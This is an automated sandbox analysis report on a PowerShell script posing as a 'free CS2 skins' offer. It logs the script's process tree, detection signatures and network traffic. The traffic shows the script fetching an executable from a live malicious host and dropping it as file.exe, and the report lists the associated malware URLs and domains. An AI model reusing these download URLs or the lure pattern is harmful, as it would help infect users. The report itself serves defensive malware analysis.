Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FreeCs2Skins.ps1

Overview

General Information

Sample name:FreeCs2Skins.ps1
Analysis ID:1562380
MD5:192bc64d6047bbc1b994c00b652ef3b5
SHA1:349886ab9c80a78f584e2140e4e3bd85f2e717c6
SHA256:b67ec07f0a31fc36bd7f8ddea36f21fdf53ec44d87b8eae0b42588b1fc963eff
Tags:cia-tfps1user-JAMESWT_MHT
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Creates HTML files with .exe extension (expired dropper behavior)
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 3300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", ProcessId: 3300, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", ProcessId: 3300, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-25T14:59:09.926351+010028032742Potentially Bad Traffic192.168.2.649700172.67.129.178443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2254642292.000001AD43499000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235888075.000001AD290A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbes8l[u source: powershell.exe, 00000000.00000002.2254642292.000001AD434A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2254642292.000001AD434A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4?Zu source: powershell.exe, 00000000.00000002.2254642292.000001AD434F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb/ source: powershell.exe, 00000000.00000002.2253609039.000001AD43221000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

Networking

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: file.exe.0.dr
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49700 -> 172.67.129.178:443
Source: global trafficHTTP traffic detected: GET /1d5ad9c8d3fee874d0feb8bfac220a11.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cia.tfConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cia.tf
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /1d5ad9c8d3fee874d0feb8bfac220a11.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cia.tfConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cia.tf
Source: global trafficDNS traffic detected: DNS query: cia.tf
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cia.tf
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B0A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B0A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.drString found in binary or memory: https://bad.is-having.fun
Source: file.exe.0.drString found in binary or memory: https://cia.tf
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C6C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2CC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236236773.000001AD293E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2BCD3000.00000004.00000800.00020000.00000000.sdmp, FreeCs2Skins.ps1String found in binary or memory: https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exe
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exeP
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.drString found in binary or memory: https://coquettte.com
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.drString found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Inter:ital
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.drString found in binary or memory: https://fonts.gstatic.com
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2BCD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348968820_2_00007FFD34896882
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348965F50_2_00007FFD348965F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34893A320_2_00007FFD34893A32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34894E5A0_2_00007FFD34894E5A
Source: classification engineClassification label: mal48.winPS1@3/7@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxz4i341.os2.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2254642292.000001AD43499000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235888075.000001AD290A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbes8l[u source: powershell.exe, 00000000.00000002.2254642292.000001AD434A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2254642292.000001AD434A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4?Zu source: powershell.exe, 00000000.00000002.2254642292.000001AD434F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb/ source: powershell.exe, 00000000.00000002.2253609039.000001AD43221000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348900BD pushad ; iretd 0_2_00007FFD348900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
